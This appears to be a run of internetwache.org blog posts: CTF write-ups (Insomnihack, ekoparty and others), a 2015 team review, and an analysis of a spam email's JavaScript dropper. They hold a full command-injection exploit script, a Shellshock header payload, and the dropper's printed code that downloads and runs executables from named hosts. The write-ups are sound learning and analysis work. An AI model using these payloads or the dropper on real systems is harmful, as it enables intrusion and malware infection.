Write 'Give me a...' on my stdin, wait 2 seconds, and then write '... flag!'.Do not include the quotes. Each part is a different line.

Bypassing the blacklist

As you probably know, blacklists are always bad and almost always bypassable. We needed a place where we could drop our code, so basically a directory with write permissions. It turned out that we had write, but no execute permissions on /tmp. We proved that by running ls>/tmp/x and then cat</tmp/x.

Okay, cool, so we can write and execute arbitrary files in the /tmp/ folder. But how do we fill them with life? I came up with here documents aka the following structure:

1
2
3

cat<<EOF>/tmp/file
helloworld
EOF

1

dest=127.0.0.1%0Acat<<EOF>/tmp/file%0Ahelloworld%0AEOF%0Als

Everything between EOF and EOF will be written to the file /tmp/file. So the next step was to somehow upload/write a program on the server which would execute the readflag binary and display the flag.

While thinking about a way to write sourcecode which doesn’t include any blacklisted characters, we ran a HOME=/%0Acd%0Afind>/tmp/files to get a list of all files on the server. The request timed out after a short while, but ran long enough to list some files from /bin, /usr/bin and so on. Some tools we thought may become useful:

• python2 / python3
• gcc / g++
• ftp / rsync / curl / wget
• gzip / gunzip / zip / unzip

I first tried to somehow abuse gzip or zip to compress a string/file which only contained a space and hoped that the output wouldn’t contain any blacklisted characters. Unfortunately, the unzipping part on the server didn’t really work. That’s when Denis had the brilliant idea of using python and a print statements to bypass the filter. In python you don’t need parenthesis nor spaces to print something:

1

print'hello world'

Additionally, you can encode characters in python with \xYY. We wrote a shellscript for the readflag binary

1

echo "Give me a...";sleep 2;echo "... flag!"

…and encoded all blacklisted characters:

1

print'''echo\x20"Give\x20me\x20a..."\x3bsleep\x202\x3becho\x20"...\x20flag!"'''

We then used our here-document-cat to create this python file in /tmp/print.py followed by running python to drop the file: %0Apython</tmp/print.py>/tmp/getflag.sh. We repeated this step for a second shellscript which executed our previous one:

1

sh /tmp/getflag.sh | /home/smartcat/readflag

Finally, we executed the last shellscript to dump the flag %0Ash</tmp/runflag.sh>/tmp/ourflag and %0Acat</tmp/ourflag to read it: INS{shells_are _way_better_than_cats}

All in all, it was a really cool challenge :)

The team of internetwache.org

Full exploit:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

import requests

# we have a cgi script and can execute remote commands
# problem: our command must not include any of: " $;&|({`\t"
# we solve this by using python to print the payload into a file
# this is we can encode any of the special characters and python doesn't need a whitespace between the print and the ''s


# upload first script 
# echo "Give me a...";sleep 2;echo "... flag!"
# encoded: 
# print'''echo\\x20\"Give\\x20me\\x20a...\"\\x3bsleep\\x202\\x3becho\\x20\"...\\x20flag!\"'''
requests.post("http://smartcat.insomnihack.ch:80/cgi-bin/index.cgi", headers={"User-Agent": "", "Cookie": "__cfduid=d753b33e9270cc520d1cc495afb6490ea1452931924", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "144"}, data={"dest": "127.0.0.1\ncat<<bbb>/tmp/tftf\nprint'''echo\\x20\"Give\\x20me\\x20a...\"\\x3bsleep\\x202\\x3becho\\x20\"...\\x20flag!\"'''\nbbb"})

# upload second script
# /bin/sh /tmp/denis | /home/smartcat/readflag
requests.post("http://smartcat.insomnihack.ch:80/cgi-bin/index.cgi", headers={"User-Agent": "", "Cookie": "__cfduid=d753b33e9270cc520d1cc495afb6490ea1452931924", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "133"}, data={"dest": "127.0.0.1\ncat<<bbb>/tmp/tftf2\nprint'''/bin/sh\\x20/tmp/denis\\x20\\x7c\\x20/home/smartcat/readflag'''\nbbb"})

# interprete first script and write to file
# python</tmp/tftf>/tmp/denis
requests.post("http://smartcat.insomnihack.ch:80/cgi-bin/index.cgi", headers={"User-Agent": "", "Cookie": "__cfduid=d753b33e9270cc520d1cc495afb6490ea1452931924", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "65"}, data={"dest": "127.0.0.1\npython</tmp/tftf>/tmp/denis"})

# pythin interprete second script and write to file
# python</tmp/tftf2>/tmp/rundenis
requests.post("http://smartcat.insomnihack.ch:80/cgi-bin/index.cgi", headers={"User-Agent": "", "Cookie": "__cfduid=d753b33e9270cc520d1cc495afb6490ea1452931924", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "69"}, data={"dest": "127.0.0.1\npython</tmp/tftf2>/tmp/rundenis"})

# execute second script and write to denisflag
# /bin/sh</tmp/rundenis>/tmp/denisflag
requests.post("http://smartcat.insomnihack.ch:80/cgi-bin/index.cgi", headers={"User-Agent": "", "Cookie": "__cfduid=d753b33e9270cc520d1cc495afb6490ea1452931924", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "84"}, data={"dest": "127.0.0.1\n\nHOME=/home/smartcat/\ncd\n/bin/sh</tmp/rundenis>/tmp/denisflag"})

# read flag file
# cat</tmp/denisflag
t = requests.post("http://smartcat.insomnihack.ch:80/cgi-bin/index.cgi", headers={"User-Agent": "", "Cookie": "__cfduid=d753b33e9270cc520d1cc495afb6490ea1452931924", "Connection": "close", "Content-Type": "application/x-www-form-urlencoded", "Content-Length": "56"}, data={"dest": "127.0.0.1\ncat</tmp/denisflag"})

print t.text

The year 2015

In 2015 we did not spend much time on the project internetwache.org compared to the years before. The low count of published articles (9 blogposts) and also the drop of positions on plattforms like Bugcrowd or HackerOne testify this. There are apparently not only not-sleeping competitors, but we have also been busy with our jobs, university or other projects.

But once we published an article on Internetwache.org, it often was thought-out and a well-structured research, which was discussed by a large audience or at least out Twitter followers.

It is a honour that our research on the AXFR-Transfer of the Alexa Top 1M lead to one of twelve alerts of the US-CERT in 2015 and was also covered in a lot of press articles.

A similar research which focused on non-protected Git-Repositories didn’t get a lot of attention from the security community, because other researchers published similar results a couple of days earlier - but we are quite happy with our results and the new knowledge.

There were a few other research ideas, but until now we did not find any time for a concrete plan to work on it. We hope that we’ll find the time in 2016 and succeed to present nice results on our blog.

Sebastian launched some other projects. For example a security-blog for personal stuff and research that doesn’t fit Internetwache.org: 0day.work. On the beginning of the year 2015 he also released the Bugbounty Portal, which doesn’t have a lot of activity until now.

Tim achieved a long pursued goal and finished his first book “Hacking im Web”. It also features some blogposts from internetwache.org and will be available in german only. The book consists of nearly 500 pages and will be published at the “Franzis Verlag” during the first quarter of 2016.

To finish off 2015 with a bang, Sebastian and Tim met on the 32nd Chaos Communication Congress (32C3) in Hamburg. As always it was fun we learnt a lot of new stuff. Sebastian even met a Cloudflare securtity engineer by just wearing the Cloudflare-bugbounty-T-shirt.

Outlook for 2016

We’re planning for to do more ‘generic’ research as showed above and try to warn about global problems. We think that this helps to get an overview of the current state of websecurity and that it will help more administrators than, for example, check only some specific webapplications. Nevetheless we’re still going to participate in bugbounty programs and stick to the general idea of internetwache.org.

The follower count on our @internetwache slowly approaches the magic number of “1000” - that’s why we will be doing a community event, but we do not want to spoil too much now. Stay tuned!

Since the beginning of internetwache (in 2012) our main focus has been web-application security, but we’re always looking on other things, too. Sebastian is going to dive into mobile application security soon and Tim wants to explore the security of SCADA and ICS and find out about information ethics.

Good luck for 2016!

The team of internetwache.org

The jury posted their sample solutions and most of them don’t differ to ours. So we’re just going to write about solutions which we approached differently.

Admin 200: Awesome web

After saving the private key admin, you could connect to one of the SSH ports:

 ssh -v -p 15026 -i /tmp/admin.key -F /dev/null admin@sibears.ru

A simple shell welcomed us:

1
2
3
4

admin:~$ ls
flag.txt
admin:~$ ?
cd  clear  echo  exit  help  history  ll  lpath  ls  lsudo

You can see the flag, but you only have a limited set of commands. I gave history a try and scrolled through the commands of other CTF participants (at least I didn’t use the majority of the commands). Luckly I discovered a strange looking string therein which turned out to be the correct flag: 4dm1n_1s_1mp0r74nt_m^^mk3y

We didn’t think that this was the intended solution, so we wanted to see if we could extract the flag ourself. We learned that there are more restrictions than just a limited set of commands:

1
2
3
4

admin:~$ ls /
*** forbidden path: /
admin:~$ echo $(< flag.txt)
*** forbidden syntax: echo $(< flag.txt)

After playing around for a while and almost giving up because of the forbidden syntax-error, we tried the following command:

1
2

admin:~$ echo "$(cat flag.txt)"
4dm1n_1s_1mp0r74nt_m^^mk3y

YAY - But we still haven’t figured out if that’s a legit solution or a bypass for the filters.

Crypto 100: Lazy cryptanalyst

We didn’t google for the website in the picture, but started to write a small python script to substitute the characters:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

text = "bsxz [....] qoiy."

newtext = ""

switch = {  'b':'t',
          's':'h',
          'x':'i',
          'z':'s',
          'u':'f',
          'm':'y',
          'o':'m',
          'i':'e',
          'q':'a',
          'g':'o',
          'v': 'l',
          'h':'u',
          'f': 'w',
          'y': 'n',
          'j':'k',
          'w': 'b',
          'e':'d',
          'l':'g'
          }
for char in text:
  if char in switch:
      char = switch[char]
  newtext += char
print(newtext)

After solving it this way, Denis hinted a website quipqiup.com which instantly found the correct substitutions.

Joy 100: Highly professional

The only difference to the given solution was, that we used Google’s reverse image search to find out that is has something to do with the hacker serie Mr. Robot. Googling further lead to a wiki which listed the names of three employees. One of them was the flag: Gideon_Goddard

Stegano 100: Pure color

The sample solution uses MS Paint to change the background color. Using GIMP we played around with the color curves of red, green & blue. Moving the blue color curve to the right-hand bottom corner revealed the yellow label with the flag: flag_is_this_is_a_simple_stego

Flags

Here’s a list with all services we solved:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

admin200: FLAG_G0D_DAMN_BR0_U_R_S0_C00L_DECRYPTOR
crypt100: a day without blood is like a day without sunshine
crypt200: remember_the_plaintext
joy100: Gideon_Goddard
web100: l375_$7ar7_w3b_h4ck5
steg100: true_steganographers_doesnt_need_any_tools
steg200: flag_is_this_is_a_simple_stego
admin200: 4dm1n_1s_1mp0r74nt_m^^mk3y
web200: n0t_0nly_1nj3ct10ns_4r3_d4ng3r0us
exploit100: thanks_god_we_got_not_only_binaries
ppc200: flag_1s_1t_w@s_t00_easy
joy200: flag_is_dont_let_apples_hit_your_brain (strings on level0)
ppc400: ~y@y_I_cod3d_!7_^^
web400: U_c4n_b3_v3ry_us3ful_0n_upc0m1ng_3l3ct10ns
admin300: Flag_is_{7Ru3_4dM1n_C4N_D0_4Ny7h1NG_Fr0M_C0MM4nD_L1N3}
exploit300: every_haxor_loves_EvAlS

The team of internetwache.org

First of all, here’s an screenshot of the email:

Let’s go on and have a look at the headers:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

Received: from unknown (HELO br184.hostgator.com.br) (192.185.176.27)
[..]
From: "Interfax" <incoming@interfax.net>
Reply-To: "Interfax" <incoming@interfax.net>
[..]
X-PHP-Script: www.temnoboqueirao.com.br/post.php for 213.198.53.247
[..]
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - br184.hostgator.com.br
X-AntiAbuse: Original Domain - internetwache.org
X-AntiAbuse: Originator/Caller UID/GID - [30210 500] / [47 12]
X-AntiAbuse: Sender Address Domain - br184.hostgator.com.br
X-BWhitelist: no
X-Source-IP: 
X-Exim-ID: 1Zskih-0002l3-D7
X-Source: /usr/bin/php
X-Source-Args: /usr/bin/php /home/temno589/public_html/post.php 
X-Source-Dir: temnoboqueirao.com.br:/public_html
X-Source-Sender: 
X-Source-Auth: temno589
X-Email-Count: 259
X-Source-Cap: dGVtbm81ODk7dGVtbm81ODk7YnIxODQuaG9zdGdhdG9yLmNvbS5icg==

We’ve notified hostgator about this probably compromised hosting account. Someone seems to use a simple PHP-script to distribute spam. Interestingly, interfax.net has a SPF record, so we’re wondering why this email had not been rejected by our hoster.

1
2

$> dig TXT interfax.net +short | grep spf 
"v=spf1 ptr mx ip4:194.169.197.0/24 ip4:198.90.20.0/27 ip4:50.23.155.98 ip4:94.228.32.66 ip4:54.246.94.152 ip4:94.228.33.224/27 include:_spf.google.com -all"

The attachment is a zip file called scan-00311594.zip and it contains a javascript file:

1
2
3
4
5
6
7

$>unzip -l scan-00311594.zip 
Archive:  scan-00311594.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
     9558  2015-11-01 02:58   scan-00311594.doc.js
---------                     -------
     9558                     1 file

Here’s the raw content and now reformatted and more readable. Please note that we’ve modified two lines in the latter one to use console.log() instead of eval(). Running it gives the following output:

1

var b = "j-hsu.com kennedy.sitoserver.com arivusampark.com".split(" "); var ws = WScript.CreateObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"499925"; var xo = WScript.CreateObject("MSXML2.XMLHTTP"); var xa = WScript.CreateObject("ADODB.Stream"); var ld = 0; for (var n=1; n<=3; n++) { for (var i=ld; i<b.length; i++) { var dn = 0; try { xo.open("GET","http://"+b[i]+"/counter/?id="+str+"&rnd=339019"+n, false); xo.send(); if (xo.status == 200) { xa.open(); xa.type = 1; xa.write(xo.responseBody); if (xa.size > 1000) { dn = 1; xa.position = 0; xa.saveToFile(fn+n+".exe",2); try { ws.Run(fn+n+".exe",1,0); } catch (er) { }; }; xa.close(); }; if (dn == 1) { ld = i; break; }; } catch (er) { }; }; };

Doing some reformatting again….

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

var b = "j-hsu.com kennedy.sitoserver.com arivusampark.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+"499925";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n=1; n<=3; n++) {
        for (var i=ld; i<b.length; i++) {
                var dn = 0;
                try {
                        xo.open("GET","http://"+b[i]+"/counter/?id="+str+"&rnd=339019"+n, false);
                        xo.send();
                        if (xo.status == 200) {
                                xa.open();
                                xa.type = 1;
                                xa.write(xo.responseBody);
                                if (xa.size > 1000) {
                                        dn = 1;
                                        xa.position = 0;
                                        xa.saveToFile(fn+n+".exe",2);
                                        try {
                                                ws.Run(fn+n+".exe",1,0);
                                        } catch (er) { };
                                };
                                xa.close();
                        };
                        if (dn == 1) {
                                ld = i;
                                break;
                        };
               } catch (er) { };
        };
};

Wscript is an object which provides access to the window script host. With that, the script creates a WshShell object which can be used to run programs locally. It’s already obvious where this is going…. It tries to downlaod three different files (rnd=: 3390191, 3390192, 3390193) from the following urls, executing them afterwards:

1
2
3

http://j-hsu.com/counter/?id=5552565E1001171056240D0A1001160A01101305070C014A0B16035E3C5E1001090A0B060B1511010D16050B4A070B094A06165E17575E555050525751575D5D565E55&rnd=3390191
http://kennedy.sitoserver.com/counter/?id=5552565E1001171056240D0A1001160A01101305070C014A0B16035E3C5E1001090A0B060B1511010D16050B4A070B094A06165E17575E555050525751575D5D565E55&rnd=3390192
http://arivusampark.com/counter/?id=5552565E1001171056240D0A1001160A01101305070C014A0B16035E3C5E1001090A0B060B1511010D16050B4A070B094A06165E17575E555050525751575D5D565E55&rnd=3390193

It will save them to %TEMP%\4999251.exe, %TEMP%\4999252.exe and %TEMP%\4999253.exe.

We decided to download them manually with curl:

1
2
3
4

$> md5sum drop.exe.rev.*
dcd46cecc84d08c220a8a464d2654b81  drop.exe.rev.1
df29fe12dad8810cdc80790167954401  drop.exe.rev.2
2fc2e5816852abf7071364fa4625aaa2  drop.exe.rev.3

The files aren’t that big:

1
2
3
4

$> du -sb drop.exe.rev.*
234018        drop.exe.rev.1
235008        drop.exe.rev.2
467456        drop.exe.rev.3

We’re both not into reverse engineering, so we decided to upload the files to virustotal.com. Most AVs do not detect the files as malicious (date: 1st of November 2015):

• drop.exe.rev.1
• drop.exe.rev.2
• drop.exe.rev.3

We’ve also submitted one sample to Anubis and Malwr.com, but it takes ages for them to analyse it.

That’s all about it. Nothing special, but Sebastian was just curious about it. However, it’s interesting and new to us that Windows seems to directly execute javascript (.js) files.

The team of internetwache.org

• Slogans ( Trv 50)
• SSL Attack (Trv 90)
• Blocking truck (Trv 100)
• Pass Check (Web 50)
• XOR Crypter (Cry 200)
• Press it (Misc 100)

And some notes on other services I’ve tackled.

I wish I had more spare time for this CTF. Some challenges seemed promising. Here’s what I’ve managed to solve:

Slogans

The task was to find the slogans for the past ekopartys 2008 & 2009.

As the slogan is prominently shown on the website, my first idea was to use the wayback machine to view the older websites. Unfortunately, 2008 wasn’t recorded, so I decided to ask the allmighty Google. I fed it with the following google dork:

1

intext:ekoparty intext:2008 intext:slogan

The first result was a blogpost which contained the slogans of both 2008 and 2009:

The accepted flag was: EKO{Vi root y entre_What if r00t was one of us?}

SSL Attack

The task was to find the name of one of the SSL attacks presented at ekoparty.

Again, a bit google magic (intext:ekoparty intext:ssl) listed websites containing some well known candidates as BREACH, CRIME and BEAST. The latter one was the correct solution.

Flag: EKO{BEAST}

Blocking truck

The description stated that there’s a blue truck in front of the entrance. The correct flag is the url on the truck.

At first I thought that I couldn’t solve the challenge as I’m not at the venue, but sitting in front of my laptop in Berlin. As I didn’t believe that they would create a task which could only be solved by local teams, I decided to open the contact page and paste the address into google maps. Voila! You can use streetview to view the blue truck:

The domain was a bit blurry, but typing desimonehnos.com.ar into google lead to the correct website. The task stated that the flag is the url to contact the company. I needed some tries to figure out that the url to the landing page was enough.

Flag: EKO{http://www.desimonehnos.com.ar} or EKO{www.desimonehnos.com.ar} (can’t remember it anymore..)

Pass check

This was the first web challenge. It looked funny and made funny sounds when entering characters ;)

The sound and the blinking numbers were nice, but didn’t have anything to do with the solution. I started up BurpSuite to capture the ajax call. After trying some easy guesses, I replaced the password=test with password[]=test and the application was so kind to display the flag.

Flag: EKO{strcmp_not_s0_s4fe}

The function strcmp isn’t good at comparing things that aren’t strings. An interesting list can be found on php.net.

XOR Crypter

This task provided the following string CjBPewYGc2gdD3RpMRNfdDcQX3UGGmhpBxZhYhFlfQA= and some python code.

The string is obviously base64 encoded, but decoding it didn’t seem the be helpful (0O{sh1_t7_uhiabe}), so I had to have a look on the sourcecode. The encryption algorithm first pads the data to be a multiple of 4. After that it’s split into chunks of 4 bytes. Every block is xored with a 16-right-shifted version of itself. I looked up the operator priority and >> comes before ^. The final operation is to pack every block and base64 encode the result.

The main issue here was the use of XOR in combination with the right-shift. Here’s a simulation of happens:

1
2
3
4
5
6

# 1001 >> 2 (9 shifted by 2 adds zeros to the beginning and the result is 0010 = 2)
# 0010 ^ 1001 (2 xored 9 is 1011 = 11; This is the result of our encryption.)

# 1011 >> 2 (11 shifted by 2 is 0010 = 2)
# 0010 ^ 1011 (11 xored with 2 is 1001 = 9)
# 1001

Note that a N-right-shift caused the first N bits of the xored block to be the same as the input block. The reversibility of XOR ((Y ^ U) ^ U = Y) helps us to recover the remaining part of the block. The other operations (base64-encoding, (un)-packing) have to be applied in reversed order. Here’s a link to my dirty-hacky-python-code (I’ve added some print/debug statements…)

Flag: EKO{unshifting_the_unshiftable}

Press it

In my opinion this was the most interesting challenge which I’ve successfully solved. The task was to extract the flag from the following file.

I first thought that these are just some random hex numbers, but then recognized the format again. I saw it when I executed /usr/bin/showkey when trying to solve the dr.bob hacklu 2015 challenge. I opened tty2 on my machine and ran showkey -s and it printed similar hex numbers when I hit my keyboard.

I started googling for a program or tool which would automatically decode the scancodes to ascii characters, but to no avail. (Or at least not running on linux and I didn’t want to install wine)

Reading through the showkey manpage I learned that those codes are called scancodes which are unique per key. There are always two scancodes per key: One when it’s pressed and one when it’s released.

The last fact is important, because I first tried to decode the characters only with the ‘pressed’ codes and that turned out to look weird (Pastebin). All the ? or empty codes are mostly key releases. Additionally, I had to learn the hard way that scancode-combinations are also possible on some keyboards. E.g. 0xe0 0x38 is Left-Alt. Microsoft has a good document with scancode mappings.

After going through all scancodes a second time I had the following result in my notepad: This is it. EKO{ibm_model_m}

Flag: EKO{ibm_model_m}

Other challenges/notes

As always, I had a look on other challenges and tried to solve them, but eventually got stuck somewhere. I’m a bit disappointed that I didn’t manage to solve Mr Anderson (I don’t know the film, but googling the solution shouldn’t be that hard?), Custom ACL (I’ve spent a great portion of the time with this one. Probably only one tiny step missing).

Mr Anderson (Trv 80)

• Mr Anderson and last serie point to Mr.Robot
• Can’t figure out the favority music artist part. Tested some artists of the last episode’s soundtracks. No luck
• Not enough motivation to brute force all possible artists.

Custom ACL (Web 100)

• Discovered sourcecode of admin.php at admin.phps (Pastebin)
• Tried to spoof REMOTE_ADDR with X-Forwarded-For & co until learning that it really only is the IP of the TCP-connection.
• Running nmap against the IP range 67.222.139.223-230 results in one host with some interesting ports (Pastebin)
• Trying to use it as a proxy always fails with the message 501 method "GET/POST/Whatever" not supported
• Noticing the Server: pve-api-daemon/3.0-header, but can’t figure out how to (ab)use the proxmox daemon for the solution.
• Not enough time to further analyse it.

Crazy JSON (Web 300)

• evaluator.js missing on the server: suspicious
• HTTP Response contains interesting JSON (Pastebin)
• new Ajsone() call. Google points to a github repository with demo input/evaluation area.
• Xor (^) isn’t implemented. Implementing it.
• Password has to be 32 characters long, but further evaluations/execution lead to an error inf loop?.
• No time to further investige it. Nevertheless interesting :)

SVG Viewer (Web 400)

• Uploading SVG with XXE testvector -> Entity declaration detected error
• Idea of using an own external DTD to bypass this check. Doesn’t really work as expected. Running out of time -> context switch to another challenge

Olive (Misc 50)

• Mostly VNC traffic / Http traffic doesn’t look interesting
• Extracting VNC traffic to file. Seems like a RFB (remote frame buffer)
• Looking for a tool to replay it. Neither rfbproxy nor vncreplay work well with the dumped data.
• Running out of ideas on how to replay/view/decode the RFB

Again, thanks for this awesome CTF :)

Sebastian

• Module Loader (Web, 100)
• PHP Golf (Coding, 75)
• Guessthenumber (Coding, 150)
• Bashful (Web, 200)

First of all I want to say that CTFs are fun. If you haven’t participated in one yet, go to ctftime.org to find a list of upcoming CTFs. During this CTF I teamed up with Denis and Mazen chimed in for bashful.

Module Loader

This was an easy warm-up challenge: A web application which took a $_GET['module'] parameter an then executed the given module. Having a quick look into the sourcecode of the website tells us where the modules are located.

The /modules/ folder greets us with a nice directory listing and all available modules:

You could even click on the modules and see their full sourcecode, but that didn’t seem to help a lot. So let’s see if this is a local file inclusion and if we can manipulate the path:

Okay, that’s cool. Denis came up with the idea of including the .htaccess-file from the document root.

The last step was to include the flag.php file in the hidden directory.

Done :)

PHP Golf

This challenge was pretty cool, because you had to write a php program for the following task and conditions:

I first started out to just implement the functionality without looking at the length of the code. The code did what it should, but it was way too long, so it became obvious that you can’t solve this challenge without regular expressions.

The second version used regular expressions and preg_replace with the e modifier to convert the matches to upper/lower case:

1

<?=preg_replace('/(\w)([^\w]*)(\w)?/e',"strtoupper('$1').'$2'.strtolower('$3')", $argv[1]);?>

However, this version was still too long with about 90 characters. This was when I started to look for ways to replace the long strtoupper / strtolower calls. The solution are so called unicode character properties. I somehow didn’t manage to get them to work with the replacement parameter of preg_match, so I tested them with perl:

1

<?=exec("echo '$argv[1]'|perl -pe 's~(\w)([^\w]*)(\w)?~\U\\1\E\\2\L\\3\E~g'");?>

The trick is, that everything between \U and \E will be converted to it’s uppercase representation. \L will convert to lowercase. Unfortunately, the submission server didn’t offer perl and this version was again too long (~80), but we were allowed to use exec and other commands. My next thought was about using sed. However, this was at around 2 o’clock in the morning and I posted this to our mailing list. I decided to go to sleep and recharge for the next day.

The next morning came and before I was able to continue on the challenge, I received an email from Denis with a working solution:

1

<?=exec("echo $argv[1]|sed -r 's/(\w)(\W*\w?)/\U\\1\L\\2/g'"); 

Exactly 62 characters! Some notes about this:

• [^\w] is the same as \W
• <?= is the same as <? echo
• You can omit the trailing ?> if the code ends with a semicolon.

This solution still had problems with underscores (_) in the input string, but we had luck to get one without these and successfully recovered the flag:

Done

Guessthenumber

The task of this challenge was to guess 100 numbers in the correct order.

The following hints were given:

• The server uses a Linear congruential generator
• Uses the standard glibc parameters
• Initialized with the python strftime format YmdHMS
• Numbers are between 0 and 99 (included)

I wanted to solve the challenge with python. I googled for a LCG implementation/library and found an example. The next step was to change the parameters to the glibc standards and to write the basic server/client communication code. So far, easy going.

The server always told us his current date and time. (See screenshot above) This had to do something with the initialization format YmdHMS. After extracting the values with a regular expression, I concatenated them into the given format:

1
2

    timedata=str(year)+str(month)+str(day)+str(hour)+str(minute)+str(second)
    seed(int(timedata))

The last important thing was to apply a modulo operation on the generated randon numbers. As both 0 and 99 are in the range of possible numbers, rnd() %100 was used.

Unfortunately, this didn’t solve the challenge as the first guess was always wrong. It turned out that you had to generate 100 numbers and send them in reversed order:

The full quick & dirty code: Pastebin

Done :)

Bashful

This was the challenge, I’ve spent the most time on, because I was trying way too hard. Mazen joined me on this one. But okay, let’s start slowly. Bashful was a web application, written in pure bash, that could be used to store notes (simple strings).

I’m going to post my final solution right away and write about other possibilites and chances afterwards. I’m still not sure if this solution was the intended one or not, but it worked very well :)

As you can see, I was able to use the most standard Shellshock payload in the request headers:

1

X-Foo: () { :;}; /bin/bash -c "cat /var/www/flag"

Psst: There was even a XSS by sending a http header with a XSS payload :D

I have to say, that I was kind of dissapointed by this solution. There was so much more fun within the code. While going through it, I came across the following three functions:

1
2
3
4
5
6
7
8
9
10
11
12
13

function explode {
        IFS="$1" read -ra "$2" <<< "$3"
}
function filter_nonalpha {
        echo $(echo $1 | sed 's/[^a-zA-Z0-9.!$;?_]//g')
}
function parse {
        explode '&' 'pairs' "$1"
        for pair in "${pairs[@]}"; do
        explode '=' 'keyval' "$pair"
        export $(filter_nonalpha "${keyval[0]}")="${keyval[1]}"
   done 
}

These functions were later used to parse user input:

1
2
3

if [ -v QUERY_STRING ]; then
    parse "$QUERY_STRING"
fi

The first interesting thing is the sed command in filter_nonalpha, because it replaces all characters except the ones in the square brackets. So our values can contain .!$;? which may be useful in the context of bash. The second interesting thing is the following line from parse:

1

export $(filter_nonalpha "${keyval[0]}")="${keyval[1]}"

Note that only the environment variable’s name is filtered, but not the value. Additionally we can use the parse function to set abitary environment variables. E.g. the query string DEBUG=1 will set the variable $DEBUG to 1.

A bit further down in the sourcecode, we find the following lines:

1
2
3
4
5

if [ -v DEBUG ]; then
    echo -ne '<pre>'
    printenv
    echo -ne '</pre>'
fi

As said above, putting DEBUG= into the url will print us all current environment variables:

Knowing that I can set other variables and/or overwrite existing ones, made the following two code block really interesting:

1
2
3
4
5
6
7
8
9
10
11

sessid=$(filter_nonalpha $sessid)
if [ -z $sessid ] || [ "${#sessid}" -lt 60 ]; then 
   echo 'like... really?'
   exit
fi
sessfile=$SESSION_DIR/$sessid
if [ -f $sessfile ]; then
    explode '#' 'messages' "$(cat $sessfile)"
else
    messages=()
fi

Controlling $SESSION_DIR and $sessid to set an abitary file path as the $sessfile variable and reading the content from it, sounded like a nice way to get the flag. Long story short: Setting $SESSION_DIR wasn’t the problem, but rather the length check of the $sessid variable. I was able to bypass it with $IFS$IFS...$IFS, but that failed the file existance check ([ -f $sessfile ]).

1
2
3
4
5
6
7
8
9
10
11
12
13
14

if [ ! -v page ]; then
    page=home
else
    page=$(filter_nonalpha "$page")
fi
if [[ "$page" == "index" ]]; then
    page=home
fi
file="$DOCUMENT_ROOT/$page.sh"
if [ ! -f $file ]; then
    >&2 echo "Can't load $file"
    file="$DOCUMENT_ROOT/404.sh"
fi
source $file

This seemed even more interesting, because that may directly lead to a remote code execution. Again, we should be able to control/set the values of $DOCUMENT_ROOT and $page. The combination of both would then be sourced (= executed). We only need to put our commands into a file with the ending .sh in the document root or somewhere else and change it.

I could think of two ways to trigger the RCE:

The first one was to set $SESSION_DIR=/var/www/ and $sessid=aaaa...aaa.sh (60+ times a and .sh). This should set $sessfile=/var/www/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.sh. Saving a note with these parameters in the url should create the $sessfile. Unfortunately, this didn’t work due to missing write permissions. The only thing the server did was returning a 500 error. :(

The other idea was to set $SESSION_DIR=/var/sessions and $sessid as above, to create a session file with .sh at the end. The second step would consist of setting DOCUMENT_ROOT=/var/sessions and $page=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa, but this failed with a 500 error again.

Maybe there’s some other bash magic that can be used to modify the parameters and trigger the RCE. I’m quite disappointed that I couldn’t get this to work. However, it’s funny to see that the solution was really easy and I just somehow tried too hard to find another way.

Other challenges

I had a look at other challenges and can only post some ideas that I had. Probably all in the wrong direction and senseless:

Grading-Board (Web):

• Some kind of SQL Injection
• Probably need to use the grant options to give other people access to your own table to bypass the request limit
• No time to test this

Dr.Bob (Forensic):

• Mounting .vdi image with qemu-nbd
• LVM volume, but encrypted and password unknown
• Use VirtualBox to start the saved state, but no password for users
• Try/Use volatility to extract some (useful) information
• Boot disk and use init=/bin/bash rw kernel parameters to drop into root-shell. Look for suspicious/useful files. No luck :(
• Edit saved-state with hexeditor to change /etc/passwd contents. This didn’t come into my mind at 5 o’clock :(

Teacher’s Pinboard (Web):

• Bottom of pickle.js says that splice/slice are mixed up and need to be fixed
• Pickle is some kind of encoding. Information from the cookie accountinfo will be decoded and used
• Idea: Save the single-page app and fix pickle.js. Hope that this helps to extract some information/flag from the ‘default’ notes.
• No time to test this

Future CTFs

I think, I’ll participate more often in jeopardy-style CTFs if my spare time allows it. It’s really really fun and lets you discover new stuff/get fresh ideas. Let me know if you want to team up for a particular challenge/CTF

Hope that helps, Sebastian

The following tools are packaged and maintained by Sebastian:

AXFR scanner

After our research on the Alexa Top 1M AXFR issue, we’ve published the AXFR scanner on GitHub. You can now easily install this tool with a simple yaourt axfrscanner-git. The usage of the tool has changed slightly to be more usable as a commandline tool:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

$> axfrscanner --help
usage: axfrscanner [-h] [-i [INPUTFILE]] [-o [OUTPUTFILE]] [-l [LOGFILE]]
                   [-p [PROCESSES]] [-d [DOMAIN]]

Check domains' nameservers for public AXFR

